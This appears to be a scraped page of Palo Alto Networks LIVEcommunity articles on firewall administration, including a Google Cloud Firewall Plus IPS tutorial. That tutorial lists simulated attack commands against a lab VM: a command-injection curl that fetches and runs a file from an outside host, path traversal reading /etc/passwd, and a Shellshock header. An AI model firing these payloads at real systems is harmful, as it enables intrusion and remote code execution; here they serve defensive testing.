General Articles
LIVEcommunity's General Articles area is home to how-to resources, technical documentation, and discussions with Accepted Solutions that turn into articles related to all Palo Alto Networks products.
This Nominated Discussion Article is based on the post "FIPS-CC Mode Initial Setup" by @B.Vance and answered by Cyber Elites @BPry & @OtakarKlier 
View full article
Customers With a CSP Account Who Are New to LIVEcommunity

Instructions:
1. Log into the Customer Support Portal (CSP): support.paloaltonetworks.com/
2. Go to LIVEcommunity. This can be done two ways:
   Option 1
   - Select "Resources" from the left-aligned menu of the CSP homepage.
   - Click on "LIVEcommunity".
   - Click the "Sign In" button at the top right-hand side of the LIVEcommunity homepage. If you are logged into CSP, you will automatically be logged into LIVEcommunity.
   Option 2
   - Go to the LIVEcommunity homepage (https://live.paloaltonetworks.com/).
   - Click "Sign In" in the upper right-hand corner. If you are logged into CSP, you will automatically be logged into LIVEcommunity.

LIVEcommunity Users Who Are Registering With CSP for the First Time

Instructions:
1. Register with the Customer Support Portal (CSP) using one of two methods:
   - Have your company Superuser create an account for you, OR
   - Self-register by following this guide: How to Create Your Customer Support Portal User Account
2. Then:
   - Go to LIVEcommunity and select the "Sign In" button.
   - You will be automatically logged in using SSO.
   - You will then be able to see customer content in LIVEcommunity.

Note: If you have more than one LIVEcommunity account, please reach out to community@paloaltonetworks.com to have them merged.

Customers Who Are New to Both CSP and LIVEcommunity

Instructions:
1. Register with the Customer Support Portal (CSP) using one of two methods:
   - Have your company Superuser create an account for you, OR
   - Self-register using this guide: How to Create Your Customer Support Portal User Account
2. Once registered and logged in to CSP, either:
   - Click on the "Resources" option on the left-hand side menu and select LIVEcommunity, OR
   - Follow this link to LIVEcommunity and select "Sign In" in the upper right-hand corner. You will be automatically logged in using SSO.

You can read more in LIVEcommunity's FAQ.
View full article
A Nominated Discussion on implementing automatic safeguards for GlobalProtect against brute force attacks.
View full article
This Nominated Discussion Article is based on the post "Internet -> PA-440 -> ASUS RT-AX53U AX1800. Error = Router does not get Internet access" by @SoloSigma and answered by Cyber Elite @reaper.
View full article
Digging into the depths of policy details can be quite the task, especially after a long and tiring day. But fear not, handy search tools are here to lighten your load!
View full article
This Nominated Discussion Article is based on the post "How to Renew Global Protect VPN certificate signed by third party vendor?" by @tthapa23 and answered by Cyber Elite @aleksandar.astardzhiev!
View full article
Organizations often use Google Cloud's Application Load Balancer to distribute HTTP/HTTPS traffic to VM-Series firewalls deployed within Google Cloud.

Diagram 1

In this setup, the Application Load Balancer functions as a proxy, altering the client's source address before forwarding the request to the VM-Series for security inspection. This presents a challenge for organizations that define security policies based on the client's address, or that require client IP preservation for backend applications protected by the VM-Series.

Using XFF Headers with PAN-OS

Within PAN-OS, the firewalls can be configured to use the source address carried in an X-Forwarded-For (XFF) header to enforce security policy. When configured, the firewall applies policy based on the address that was most recently added to the XFF field.

However, when using the Application Load Balancer, this approach alone will not work, because the load balancer appends two addresses to the XFF header: the <load-balancer-ip> is the most recent address within the header and the <client-ip> is the next-to-last address.

    X-Forwarded-For: <client-ip>, <load-balancer-ip>

Solution

Within the backend service configuration of the Application Load Balancer, you can define custom request headers to make the client address the most recently added address in the XFF field. When used, the load balancer preserves the supplied value of the custom header before the <client-ip>, <load-balancer-ip> addresses.

    X-Forwarded-For: <supplied-value>, <client-ip>, <load-balancer-ip>

To insert the client's address as the supplied value, use the client_ip_address header variable. This variable contains the client's IP address and has the same value as the <client-ip> address. Once configured, the VM-Series can use the client's address to enforce policy.

Diagram 2

Steps to Implement

The steps below outline how to add the client_ip_address value as a custom header to an existing Application Load Balancer that uses the VM-Series as its backend service.

Adding a Custom Request Header to the Backend Service
1. In Google Cloud, go to Network Services → Load Balancing. Select your Application Load Balancer and click Edit.
2. Select Backend Configuration and click the edit icon next to the backend service.
   Selecting backend
3. Under Advanced Configurations → Custom Request Headers, click Add Header.
4. Set the header name to X-Forwarded-For and the header value to {client_ip_address}.
   Adding custom header
5. Click Update to apply the changes.

Configure VM-Series for XFF Headers
1. On the VM-Series, go to Device → Setup → Content-ID → X-Forwarded-For Headers.
2. Set Use X-Forwarded-For Header to Enabled for Security Policy.
   Enabling XFF for policy.
3. Commit the changes.

View Traffic Logs
Once the changes have been applied, you can view the value of the client_ip_address header within the firewall's traffic logs.
1. Simulate traffic flows through the Application Load Balancer to your application.
2. Go to Monitor → Traffic and add the X-Forwarded-For IP field to the log view.
   Log viewer.
The traffic logs should now contain the client's IP address under the X-Forwarded-For IP column. This address can then be used as the source address within the VM-Series security policies.

Traffic logs
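The article's two header shapes make the parsing problem concrete: a consumer that simply takes the most recently appended XFF entry ends up with the load balancer's address. The helper below is an added example, not code from the article or from Palo Alto Networks. It builds both header shapes exactly as the article describes them and then derives the client address with the generic "walk from the right past trusted proxies" rule, which is a different technique from PAN-OS's own header handling; because the walk does not depend on position, it yields the client for the plain header and for the custom-header shape alike. The proxy range and all addresses are constructed documentation-range values, and TRUSTED_PROXIES, alb_header, parse_xff, most_recent_entry and client_from_xff are names chosen here.

```python
"""Derive the client address from an X-Forwarded-For header as a Google Cloud
Application Load Balancer builds it.

Added example (not the article's code). The two header shapes follow the article:
    X-Forwarded-For: <client-ip>, <load-balancer-ip>
    X-Forwarded-For: <supplied-value>, <client-ip>, <load-balancer-ip>
The selection logic is the generic "walk from the right past trusted proxies"
rule, not PAN-OS's header handling. Addresses are constructed RFC 5737 values.
"""
from ipaddress import IPv4Address, IPv6Address, ip_address, ip_network
from typing import Iterable, List, Optional, Union

Address = Union[IPv4Address, IPv6Address]

# Constructed: the range the load balancer proxies are assumed to source from.
# In a real deployment use the load balancer's published proxy ranges.
TRUSTED_PROXIES = [ip_network("198.51.100.0/24")]


def alb_header(client_ip: str, lb_ip: str, supplied: Optional[str] = None) -> str:
    """Build the XFF value the way the article describes the load balancer doing it:
    the optional custom/supplied value first, then the client, then the LB itself."""
    parts = [supplied] if supplied else []
    parts += [client_ip, lb_ip]
    return ", ".join(parts)


def parse_xff(header: str) -> List[Optional[Address]]:
    """Split a comma-separated XFF value into addresses. Entries that are not IP
    literals become None so the caller can see where unparseable data sits."""
    entries: List[Optional[Address]] = []
    for raw in header.split(","):
        token = raw.strip()
        if not token:
            continue
        try:
            entries.append(ip_address(token))
        except ValueError:
            entries.append(None)
    return entries


def most_recent_entry(header: str) -> Optional[Address]:
    """The last (most recently appended) entry. With the plain LB header this is
    the load balancer's own address, which is the problem the article describes."""
    entries = parse_xff(header)
    return entries[-1] if entries else None


def client_from_xff(header: str, trusted: Iterable = TRUSTED_PROXIES) -> Optional[Address]:
    """Walk the chain from the right. Entries belonging to a trusted proxy were
    appended by infrastructure we control and are skipped; the first other entry is
    the client as the nearest proxy saw it. Anything further left (the
    <supplied-value> slot) is unverified and ignored. Returns None if the chain is
    empty, ends in a non-IP token, or contains only proxies."""
    trusted = list(trusted)
    for entry in reversed(parse_xff(header)):
        if entry is None:
            return None
        if any(entry in net for net in trusted):
            continue
        return entry
    return None


def demo() -> dict:
    """Run both header shapes from the article through the two selection rules."""
    client, lb = "203.0.113.7", "198.51.100.20"      # constructed sample addresses
    plain = alb_header(client, lb)                    # <client-ip>, <lb-ip>
    fixed = alb_header(client, lb, supplied=client)   # {client_ip_address}, <client-ip>, <lb-ip>
    return {
        "plain_last": str(most_recent_entry(plain)),   # the LB address: the problem
        "plain_client": str(client_from_xff(plain)),
        "fixed_client": str(client_from_xff(fixed)),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The walk deliberately returns None rather than guessing when the entry directly left of the proxy chain is not an IP literal; a policy engine should treat that as "no usable client address" instead of falling back to whatever string the request carried.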
View full article
This Nominated Discussion Article is based on the post "Move Firewall to New Panorama" by @securehops and answered by Cyber Elite @TomYoung.
View full article
This Nominated Discussion Article is based on the post "HSCI and HA" by @Ramakrishnan and answered by @reaper & @aleksandar.astardzhiev.

Folks, I would like to understand the difference between HSCI and HA1, HA1B, HA2, HA2B.
As per my understanding, HA1 is for control & HA1B is the backup link; HA2 is for data & HA2B is the backup link.
Control carries heartbeats and communication. Data traffic carries the IP table, ARP table, session table? Is that correct?
For stateful session sync-up, must we use the HSCI link, or can it be done over HA2?
I have little expertise in PA, but I have never seen such an implementation. Can you please clarify? Your swift response is much appreciated.

Response:

HA1 is the 'brains' of the HA cluster, sharing configuration, routing information, control messages to see if the peer is alive and functional, etc.
HA1b is a backup link (if for some reason HA1 is disconnected but both firewalls are still fully functional, they will assume the remote peer is down and both start accepting packets at the same time; this is not fun to have happen, so make sure to set up HA1b).

HA2 is where the session table gets synced, so if a firewall goes down the peer can pick up existing sessions; HA2b is the backup link.
You are not required to use the HSCI link; you can assign the type 'HA' to dataplane interfaces and use those instead.
You cannot use HSCI for HA1 connections; you should use either the dedicated HA1a/HA1b, the AUX1/AUX2, or dataplane interfaces (dedicated links preferred).

Please check the following documentation:
- https://docs.paloaltonetworks.com/hardware/pa-1400-hardware-reference/pa-1400-series-overview/front-panel-1400-series
- https://docs.paloaltonetworks.com/pan-os/10-1/pan-os-admin/high-availability/ha-concepts/ha-links-and-backup-links/ha-ports-on-the-pa-7000-series-firewall

HSCI is a high-speed interface whose main purpose is to be used for HA2.

As @reaper already mentioned, HA2 is the data link; it is used to sync session information between the two HA members (and also to forward traffic in case you use active/active). So if you have the physical capability to connect both members directly (no routers, no switches, no other intermediate devices), it is always recommended to use the HSCI for HA2.

If you cannot connect both peers directly, you can reserve one of the dataplane interfaces for HA and then configure HA2 to use that dataplane interface. By default no dataplane interface is reserved for HA, which is why when you try to edit HA your dropdown offers only HSCI.

Regarding the IP addresses:
- As you can see from the above links, HSCI is a layer 1 interface, so you must use "ethernet" for HA2 transport, which uses PAN custom/proprietary Ethernet frames that don't use IP addresses. So even if you set some addresses, they will be ignored if transport is set to ethernet.

  Transport — Choose one of the following transport options:
  Ethernet — Use when the firewalls are connected back-to-back or through a switch (Ethertype 0x7261).
  IP — Use when Layer 3 transport is required (IP protocol number 99).
  UDP — Use to take advantage of the fact that the checksum is calculated on the entire packet rather than just the header, as in the IP option (UDP port 29281). The benefit of using UDP mode is the presence of the UDP checksum to verify the integrity of a session sync message.

- For HA1 you must use IP addresses, and you must have different addresses for each member. If you connect them directly, you have to specify the same subnet. If they are not connected directly, you should configure a gateway which will route between the two networks.
View full article
Next-Generation Firewalls are equipped with TPM chips to help secure the devices. These systems are designed to "lock out" after 32 abrupt power-down events (power failure, pulling the power cord to turn the device off). For every ungraceful shutdown, the TPM counter is incremented by 1; after 32 such events the device goes into lockout mode.

Once the system is in lockout mode, it will not boot properly. For systems with encrypted drives, the system will stay at the BIOS level. For systems with non-encrypted drives, it will boot into maintenance mode.

For the system to recover, keep it powered on for at least two hours. For every two hours the device is powered on, the TPM lockout counter is decremented by one. For systems with encrypted drives, the system will auto-reboot and should come back up properly. For systems with non-encrypted drives, perform a reboot from maintenance mode.

To make sure the device does not go into lockout mode, make sure it has proper power and, whenever you need to turn it off, do so gracefully by using the power-down option. Follow the steps outlined in this document to perform a graceful shutdown from the operational CLI/GUI whenever you want to power the device down.
View full article
This Nominated Discussion Article is based on the post "Basic Question about DNS Query".
View full article
This Nominated Discussion Article is based on the post "How to view correlated logs on the FW?" by @JeffersonDias and replied to by @kiwi, @OtakarKlier, @Terje_Lundbo.

I currently have an environment with TP, GP, ADVURL and WF, and sometimes I need to see the full info of a user instead of going to Traffic and checking some portion, then going to URL Filtering and finding something "maybe" related, and so on. I keep getting results using ACC, but even there it is split into tabs, so I can check Traffic but then I need to switch to Threats to see some more. Is there a way, even via ACC, to create a view that shows everything related to that traffic?

If you go to the detailed log view, you'll get related logs for the same session at the bottom. Notice how this example shows the related URL logs and Threat logs (identified by the TYPE column) at the bottom for the selected traffic log:

In addition to that, you can look at the Unified logs. This combines the Traffic, URL, and Threat logs into the same view. Then when you find the log you wish to drill down into, click the magnifying glass icon.

You can control which logs are shown in Unified by clicking on the two down arrows to the left of the query field and choosing your log types. To get reasonably quick responses, I have been advised by TAC to limit the log types to a maximum of 3.

In addition to this, if you add a date and time with a "greater than" filter, this will also speed things up. ( receive_time geq '2023/10/06 00:00:00' ) will filter on any logs created after 12am on Oct 10.
View full article
Factory resetting your firewall is a drastic step that should only be taken when necessary and with careful consideration: it will erase all configurations and data on the firewall. If you decide a factory reset is the route you need to take, make sure to back up your existing configuration and keep a tech support file on hand for that device.

Steps to Factory Reset Your VM-Series Firewall

1. Log in to the CLI and enter the following command:

    debug system maintenance-mode

   Once entered, your VM-Series will reboot.
2. Continue into maintenance mode and select "Factory Reset".
3. Press Enter while on "Factory Reset". Your firewall will then go through the reset process.
4. Once complete, select "Reboot" and press Enter.

Your VM-Series Firewall will then reboot normally and you will have a fresh image of PAN-OS. Wait for the "PA-VM:" login prompt to enter the default credentials.
View full article
This Nominated Discussion Article is based on the post "What do you people think of this script?" by @hfakoor2.

I wrote a Python script that returns the differences in policies across firewalls. Here's the GitHub description:

Firewall policies contain object groups, hundreds of IP addresses and ACLs, services, address objects, etc. This script compares a set of firewall policies with the same name across many firewalls, and returns differences in services, source/destination, address objects, ACLs, etc., to a Python dictionary. We use an XML path API call to obtain the configuration files, so there is no need for token authentication. The script also returns object groups that exist in one firewall and not the other. So if your firewalls have similarly named policies with dozens of rules, this script can save time in validating the policies by hand.

There's a video of the code running against 10.0.4 vm_eval editions.
https://github.com/hfakoor222/Palo_Alto_Scripting/tree/master
The code is under the folder compare_Object_ACL's.

Please let me know what you think, and where I can improve. Also like or follow my GitHub page for more scripts. Thanks!

That is a very nice script!

If someone were going to use your script in production, then I would store the username and password (or API keys) in local environment variables and not in the script. That is not required, but it is definitely a best practice, especially if they use Git or another development platform where the code is shared. Your scripts have the default usernames and passwords, so no sensitive information is exposed in your example.

Great job!
View full article
Packet Buffer Protection is one of the first lines of defense. Find out why it's important and how it can improve your security posture.
View full article
This is a guide that shows how to deploy and use Google Cloud Firewall Plus, a native Google Cloud service powered by Palo Alto Networks Threat Prevention technologies.

Cloud Firewall is a fully distributed firewall service with advanced protection capabilities, micro-segmentation, and pervasive coverage to protect your Google Cloud workloads from internal and external threats, including intrusion, malware, spyware, and command-and-control. The service works by creating Google-managed zonal firewall endpoints that use packet intercept technology to transparently inspect the workloads for the configured threat signatures and protect them against threats.

Diagram

ℹ️ Note: Cloud Firewall Plus is currently in public preview. For the most recent version of this guide, please see the Google Cloud Firewall Plus Tutorial GitHub repository.

Requirements
- Familiarize yourself with Cloud Firewall Plus.
- A valid gcloud (SDK 447.0.0 or greater) installation, or access to Google Cloud Shell.
- A Google Cloud project with Organizational admin access.

Topology
Below is a diagram of the environment. A VPC network contains two virtual machines (attacker and victim) that are used to simulate threats. Each virtual machine has an external address associated with its network interface to provide internet connectivity.

When Cloud Firewall Plus is enabled, Google Cloud firewall rules intercept VPC network traffic (including north-south and east-west) and redirect it to the Firewall Plus endpoint for inspection. All actions taken by the service are logged directly in the Google Cloud console for you.

Topology

Prepare for deployment
Prepare for deployment by enabling the required APIs, retrieving the deployment files, and configuring the environment variables.

1. Open Google Cloud Shell and enable the required APIs.

    gcloud services enable compute.googleapis.com
    gcloud services enable networksecurity.googleapis.com

2. List your Organization ID(s).

    gcloud organizations list

3. Set the desired Organization ID to the environment variable ORG_ID.

    export ORG_ID=ORGANIZATION_ID

4. List your projects within the organization.

    gcloud alpha projects list --organization=$ORG_ID

5. Set the desired Project ID to the environment variable PROJECT_ID.

    export PROJECT_ID=PROJECT_ID

6. Set your Project ID in your gcloud configuration.

    gcloud config set project $PROJECT_ID

7. Set values for the deployment's REGION, ZONE, and naming PREFIX.

    export REGION=us-central1
    export ZONE=us-central1-a
    export PREFIX=panw

8. Select a deployment option. Both options deploy identical environments.
   - Scripted Deployment: All of the cloud resources required for the tutorial are deployed using a single script. Best for users who are familiar with Cloud Firewall Plus and want to quickly test use-cases.
   - Step-by-step Deployment: Each cloud resource is deployed individually through gcloud. Best for users who are new to Cloud Firewall Plus or want control over which resources are deployed.

Scripted Deployment

1. In Cloud Shell, clone the repository and change directories.

    git clone https://github.com/PaloAltoNetworks/google-cloud-firewall-plus-tutorial
    cd google-cloud-firewall-plus-tutorial

2. Execute the script to create the environment.

    ./ips_create.sh

3. When the script completes, proceed to Simulate Threats.

Step-by-Step Deployment

1. In Cloud Shell, create a VPC network, subnetwork, and firewall rule to allow ingress traffic.

    gcloud compute networks create $PREFIX-vpc \
        --subnet-mode=custom \
        --project=$PROJECT_ID

    gcloud compute networks subnets create $PREFIX-subnet \
        --network=$PREFIX-vpc \
        --range=10.0.0.0/24 \
        --region=$REGION \
        --project=$PROJECT_ID

    gcloud compute firewall-rules create $PREFIX-all-ingress \
        --network=$PREFIX-vpc \
        --direction=ingress \
        --allow=all \
        --source-ranges=0.0.0.0/0 \
        --project=$PROJECT_ID

2. Create two virtual machines (attacker & victim). The machines will be used to simulate pseudo-threats later.

    gcloud compute instances create $PREFIX-attacker \
        --zone=$ZONE \
        --machine-type=f1-micro \
        --image-project=ubuntu-os-cloud \
        --image-family=ubuntu-2004-lts \
        --network-interface subnet=$PREFIX-subnet,private-network-ip=10.0.0.10 \
        --project=$PROJECT_ID

    gcloud compute instances create $PREFIX-victim \
        --zone=$ZONE \
        --machine-type=f1-micro \
        --image-project=panw-gcp-team-testing \
        --image=debian-cloud-ids-victim \
        --network-interface subnet=$PREFIX-subnet,private-network-ip=10.0.0.20 \
        --project=$PROJECT_ID

3. Create a security profile and a security profile group.

    gcloud beta network-security security-profiles threat-prevention create $PREFIX-profile \
        --location=global \
        --project=$PROJECT_ID \
        --organization=$ORG_ID \
        --quiet

    gcloud beta network-security security-profile-groups create $PREFIX-profile-group \
        --threat-prevention-profile "organizations/$ORG_ID/locations/global/securityProfiles/$PREFIX-profile" \
        --location=global \
        --project=$PROJECT_ID \
        --organization=$ORG_ID \
        --quiet

4. Set the security profile's action to ALERT for threat severities categorized as INFORMATIONAL and LOW, and to block (action DENY) for those categorized as MEDIUM, HIGH, and CRITICAL.

    gcloud beta network-security security-profiles threat-prevention add-override $PREFIX-profile \
        --severities=INFORMATIONAL,LOW \
        --action=ALERT \
        --location=global \
        --organization=$ORG_ID \
        --project=$PROJECT_ID

    gcloud beta network-security security-profiles threat-prevention add-override $PREFIX-profile \
        --severities=MEDIUM,HIGH,CRITICAL \
        --action=DENY \
        --location=global \
        --organization=$ORG_ID \
        --project=$PROJECT_ID

5. Create a Firewall Plus endpoint. The endpoint can take up to 25 minutes to fully provision.

    gcloud beta network-security firewall-endpoints create $PREFIX-endpoint \
        --zone=$ZONE \
        --project=$PROJECT_ID \
        --organization=$ORG_ID \
        --quiet

    while true; do
        STATUS_EP=$(gcloud beta network-security firewall-endpoints describe $PREFIX-endpoint \
            --zone=$ZONE \
            --project=$PROJECT_ID \
            --organization=$ORG_ID \
            --format="json" | jq -r '.state')
        if [[ "$STATUS_EP" == "ACTIVE" ]]; then
            echo "Firewall endpoint $PREFIX-endpoint is now active."
            sleep 2
            break
        fi
        echo "Waiting for the firewall endpoint to be created. This can take up to 25 minutes..."
        sleep 5
    done

6. Associate the endpoint with a VPC network. The association can take up to 30 minutes to complete.

    gcloud beta network-security firewall-endpoint-associations create $PREFIX-assoc \
        --endpoint "organizations/$ORG_ID/locations/$ZONE/firewallEndpoints/$PREFIX-endpoint" \
        --network=$PREFIX-vpc \
        --zone=$ZONE \
        --project=$PROJECT_ID \
        --quiet

    while true; do
        STATUS_ASSOC=$(gcloud beta network-security firewall-endpoint-associations describe $PREFIX-assoc \
            --zone=$ZONE \
            --project=$PROJECT_ID \
            --format="json" | jq -r '.state')
        if [[ "$STATUS_ASSOC" == "ACTIVE" ]]; then
            echo "Endpoint association $PREFIX-assoc is now active."
            sleep 2
            break
        fi
        echo "Waiting for the endpoint association to be created. This can take up to 45 minutes..."
        sleep 1
    done

7. Create a Network Firewall Policy with two firewall rules to allow all ingress & egress traffic to the workload network.

    gcloud compute network-firewall-policies create $PREFIX-global-policy \
        --global \
        --project=$PROJECT_ID

    gcloud compute network-firewall-policies rules create 10 \
        --action=allow \
        --firewall-policy=$PREFIX-global-policy \
        --global-firewall-policy \
        --direction=INGRESS \
        --enable-logging \
        --layer4-configs all \
        --src-ip-ranges=0.0.0.0/0 \
        --dest-ip-ranges=0.0.0.0/0 \
        --project=$PROJECT_ID

    gcloud compute network-firewall-policies rules create 11 \
        --action=allow \
        --firewall-policy=$PREFIX-global-policy \
        --global-firewall-policy \
        --layer4-configs=all \
        --direction=EGRESS \
        --enable-logging \
        --src-ip-ranges=0.0.0.0/0 \
        --dest-ip-ranges=0.0.0.0/0 \
        --project=$PROJECT_ID

8. Associate the Network Firewall Policy with the VPC network created previously.

    gcloud compute network-firewall-policies associations create \
        --firewall-policy=$PREFIX-global-policy \
        --network=$PREFIX-vpc \
        --name=$PREFIX-global-policy-association \
        --global-firewall-policy

9. (Optional) Review the created resources: Firewall Endpoint, Firewall Endpoint VPC Network Association, Security Profile, Network Firewall Policy.

Simulate threats without Cloud Firewall Plus
Simulate several threats between the attacker and victim virtual machines without Cloud Firewall Plus inspection. Deep packet inspection does not occur because the firewall policies created in the previous step do not intercept traffic for inspection by the Firewall Plus endpoint.

Without inspection

1. In Cloud Shell, open an SSH session to the attacker VM.

    gcloud compute ssh paloalto@$PREFIX-attacker --zone=$ZONE --project=$PROJECT_ID

2. From the attacker VM, simulate pseudo-threats to the victim (10.0.0.20) VM.

    curl "http://10.0.0.20/weblogin.cgi?username=admin';cd /tmp;wget http://123.123.123.123/evil;sh evil;rm evil"
    curl http://10.0.0.20/?item=../../../../WINNT/win.ini -m 5
    curl http://10.0.0.20/cgi-bin/../../../..//bin/cat%20/etc/passwd -m 5
    curl -H 'User-Agent: () { :; }; 123.123.123.123:9999' -m 5 http://10.0.0.20/cgi-bin/test-critical -m 5

3. Attempt to download a pseudo-malicious file from the internet.

    wget www.eicar.org/download/eicar.com.txt --tries 1 --timeout 2

💡 Objective: The above threat simulations should be successful. This is because the Firewall Endpoint is not inspecting the traffic between the attacker and victim virtual machines.

Prevent threats with Cloud Firewall Plus
Cloud Firewall Plus uses Google Cloud's packet intercept technology to transparently redirect traffic from workloads to firewall endpoints. Traffic redirection is defined within network firewall rules that reference the security profile group.

Update network firewall policies
Update the network firewall policies to redirect traffic to the firewall endpoint. The action defined in the firewall rule determines which security profile group is applied to the traffic.

With inspection via Traffic Intercept

1. Modify the ingress & egress firewall rules within the global network policy to intercept traffic to the Firewall Plus endpoint.

    gcloud beta compute network-firewall-policies rules update 10 \
        --action=apply_security_profile_group \
        --firewall-policy=$PREFIX-global-policy \
        --global-firewall-policy \
        --project=$PROJECT_ID \
        --security-profile-group=//networksecurity.googleapis.com/organizations/$ORG_ID/locations/global/securityProfileGroups/$PREFIX-profile-group

    gcloud beta compute network-firewall-policies rules update 11 \
        --action=apply_security_profile_group \
        --firewall-policy=$PREFIX-global-policy \
        --global-firewall-policy \
        --project=$PROJECT_ID \
        --security-profile-group=//networksecurity.googleapis.com/organizations/$ORG_ID/locations/global/securityProfileGroups/$PREFIX-profile-group

Replay threats
Rerun the previous threats to see the actions taken by Cloud Firewall Plus.

1. In Cloud Shell, open an SSH session to the attacker VM.

    gcloud compute ssh paloalto@$PREFIX-attacker --zone=$ZONE --project=$PROJECT_ID

2. From the attacker VM, simulate pseudo-threats to the victim (10.0.0.20) VM.

    curl "http://10.0.0.20/weblogin.cgi?username=admin';cd /tmp;wget http://123.123.123.123/evil;sh evil;rm evil"
    curl http://10.0.0.20/?item=../../../../WINNT/win.ini -m 5
    curl http://10.0.0.20/cgi-bin/../../../..//bin/cat%20/etc/passwd -m 5
    curl -H 'User-Agent: () { :; }; 123.123.123.123:9999' -m 5 http://10.0.0.20/cgi-bin/test-critical -m 5

3. Attempt to download a pseudo-malicious file from the internet.

    wget www.eicar.org/download/eicar.com.txt --tries 1 --timeout 2

💡 Objective: The simulated threats from the attacker should fail. This is because the Firewall Plus service is preventing the exploits from reaching the victim machine.

View threats
All of the actions taken by Cloud Firewall Plus are logged directly to the Google Cloud console for you. These logs can be forwarded to Cortex XSIAM for further forensic investigation and action.

1. In the Google Cloud console, go to Network Security → Threats.

Cloud logs

💡 Objective: You should see the actions taken by the Firewall Plus endpoint, indicating the service has detected and/or stopped the simulated threats. The action taken against a threat is determined by the security profile group applied to the network firewall rule.

Clean up
To delete the created resources, delete your Google Cloud deployment project. If you cannot delete your deployment project, follow the steps below to delete the resources created in this tutorial.

1. If you chose the Step-by-Step Deployment, clone the repository to Cloud Shell.

    git clone https://github.com/PaloAltoNetworks/google-cloud-firewall-plus-tutorial
    cd google-cloud-firewall-plus-tutorial

2. Execute the script to delete the created resources.

    ./ips_delete

More Information
Please see the materials below for more information about the topics discussed in this tutorial.
- Announcement: Palo Alto Networks with Google Cloud Firewall
- Palo Alto Networks with Google Cloud
- Cloud Firewall Plus Overview
- Configure Intrusion Prevention Service
View full article
This Nominated Discussion Article is based on the post "What would this number be at the end of some signatures?" by @filipe.r.oliveira and answered by myself, JayGolf!

Guys, I saw that there is sometimes a different number on the same signature. What would that be? What is it for? Is there any documentation talking about it? If I block the subscription with one number and another one appears with another number, do I have to do this blocking too, or do these numbers not interfere with the subscription blocking and I can just use the name?
Example:
1- DESCRIPTION AndroxGh0st Scanning Traffic Detection(86759)
2- DESCRIPTION AndroxGh0st Scanning Traffic Detection(86760)
If you can help me with these questions, please! Thank you for your attention!

Accepted Solution:

Hi @filipe.r.oliveira,

These numbers represent the version number of the signature. In this case, "DESCRIPTION AndroxGh0st Scanning Traffic Detection(86760)" is the later version of the signature. You don't need to manually block each version, as the latest threat updates include the most recent signatures.
View full article
This Nominated Discussion Article is based on the post "Confused about QoS on Palo, need some assistance".
View full article
This Nominated Discussion Article is based on the post "Migrating PA-5050 to PA-5410".
View full article
In this article, we will look at how to identify the VM-Series versions based on the PAN-OS version and licensing model, how to deploy a specific version of VM-Series and then also how we can deploy the same through automation.  
View full article
This blog outlines the best practices for upgrading the VM series firewalls in AWS.  
View full article
This Nominated Discussion Article is based on the post "What cloud services are affected by CVE-2020-1982?".
View full article
The connection between Prisma Access and on-prem devices is usually based on the IPsec protocol for site-to-site VPNs. For extra security, configure Prisma Access to be the VPN responder and the on-prem firewall/router as the VPN initiator.
View full article
This article provides the steps to setup, demonstrate and teardown the Palo Alto Networks' VM-Series Next Generation Firewalls on AWS in integration with the AWS Gateway Load Balancer.  
View full article
This article describes the best practices for sizing Palo Alto Networks' VM-Series Next Generation Firewalls deployed on Google Cloud. Proper sizing of the deployment is very important because it provides a fairly accurate picture of how many firewalls are needed to handle the customer's traffic.
View full article
This Nominated Discussion Article is based on the post "External DHCP Configuration".
View full article
Digitization has revolutionized banking, empowering fintech firms to offer innovative services. Banks collaborate with fintech companies to enhance offerings and reach more customers. This shift is driven by the need to adapt to scalability and resiliency requirements.  
View full article
This Nominated Discussion Article is based on the post "Palo Alto Cluster Questions".
View full article
This Nominated Discussion Article is based on the post "Cant Download Panorama for esx ova".
View full article
This Nominated Discussion Article is based on the post "Test command does not work".
View full article